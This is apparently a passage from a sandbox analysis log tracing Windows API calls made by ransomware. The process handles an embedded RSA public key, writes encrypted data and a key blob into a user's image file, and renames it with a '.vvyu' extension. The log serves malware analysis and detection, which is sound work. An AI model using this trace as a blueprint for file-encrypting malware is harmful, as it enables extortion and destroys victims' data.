KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.847] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.848] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.848] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.848] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.848] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.848] GetLastError () returned 0x0 [0193.848] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.848] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.849] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.849] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.849] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x163f0) returned 0x2d49778 [0193.850] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42190 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d421d8 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.851] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f70 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.854] GetCurrentThreadId () returned 0x264 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45f70 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.854] GetCurrentThreadId () returned 0x264 [0193.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d421d8 | out: hHeap=0x6a0000) returned 1 [0193.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.868] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x163ec, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x163ec, lpOverlapped=0x0) returned 1 [0193.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.869] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x163f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.869] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.870] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.871] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.871] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.871] CloseHandle (hObject=0x584) returned 1 [0193.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0193.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0193.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0193.873] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\CfqSEGHWv8Id7U6qj5.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\cfqseghwv8id7u6qj5.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\CfqSEGHWv8Id7U6qj5.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\cfqseghwv8id7u6qj5.gif.vvyu")) returned 1 [0193.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.875] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.877] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42d2ae20, ftCreationTime.dwHighDateTime=0x1d8a079, ftLastAccessTime.dwLowDateTime=0x256ad660, ftLastAccessTime.dwHighDateTime=0x1d8a5d7, ftLastWriteTime.dwLowDateTime=0x256ad660, ftLastWriteTime.dwHighDateTime=0x1d8a5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4f42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gpf_fTIy87TJO1Dp27TE.png", cAlternateFileName="GPF_FT~1.PNG")) returned 1 [0193.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.878] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\Gpf_fTIy87TJO1Dp27TE.png") returned=".png" [0193.878] CreateFileW 